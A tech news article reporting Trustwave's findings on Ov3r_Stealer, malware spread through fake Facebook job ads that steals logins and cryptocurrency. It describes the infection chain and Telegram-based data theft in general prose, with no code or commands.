HomeWinBuzzer NewsOv3r_Stealer Malware Emerges, Targeting Facebook Users with Fake Job Ads

Ov3r_Stealer Malware Emerges, Targeting Facebook Users with Fake Job Ads

Facebook job scam spreads "Ov3r_Stealer" malware stealing crypto & logins. Job offer lures victims to fake doc that launches complex attack

-

Cybersecurity firm Trustwave has exposed a cybercriminal campaign using Facebook job advertisements to disseminate a novel malware, Ov3r_Stealer. The malware is engineered to harvest account credentials and cryptocurrency from unsuspecting users. The Trustwave research team’s analysis reveals a complex infection procedure initiated by inviting Facebook users to apply for a bogus position. Targeted users are subsequently redirected to a compromised document which activates a PowerShell script that pulls the malware from a GitHub repository.

Infection Mechanism

The scheme entices targets with a job opportunity for an Account Manager. Applicants are directed to a PDF on OneDrive, falsely represented as job details. Instead, when clicked, a redirect to Discord’s Content Delivery Network initiates, which downloads a deceptive ‘pdf2.cpl’ file. This file masquerades as a standard document but is actually a PowerShell payload that exploits Windows Control Panel files for execution. Trustwave’s findings reveal a multi-faceted malware loading approach incorporating a Windows executable, a DLL for DLL sideloading, and a Document containing the malicious payload.

Data Exfiltration Techniques

Upon successful execution, Ov3r_Stealer sets up a recurring scheduled task that operates at 90-minute intervals, ensuring its persistence on the infected system. The malware targets a wide array of applications and directories—ranging from web browsers and extensions to cryptocurrency wallets and FTP clients like Filezilla—to extract valuable data. Crucial data are transmitted to a Telegram bot, including geographic location details and summaries of the compromised information.

Investigations have traced the malware’s exfiltration activities back to usernames prominent in software cracking forums, hinting at the actors’ possible origins. Moreover, code parallels have been observed between Ov3r_Stealer and another known C# stealer, Phemedrone, suggesting a derivative relationship between the two strains. Trustwave has also unearthed demonstration videos that indicate the threat actors’ possible attempts to entice buyers or collaborators for their malicious tools.

Despite its origins being shrouded in ambiguity, given that the associated accounts demonstrate a mix of Vietnamese, Russian, and French signals, what remains clear is the threat posed by Ov3r_Stealer. It exemplifies the increasing sophistication and resourcefulness of cybercriminals leveraging social media platforms to deploy their nefarious payloads. Trustwave’s exposure of this threat serves as a crucial reminder of the constant vigilance required in the digital landscape.

Last Updated on November 7, 2024 10:35 pm CET

SourceTrustwave
Luke Jones
Luke Jones
Luke has been writing about Microsoft and the wider tech industry for over 10 years. With a degree in creative and professional writing, Luke looks for the interesting spin when covering AI, Windows, Xbox, and more.

Recent News

0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Newest
Oldest Most Voted
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x
Mastodon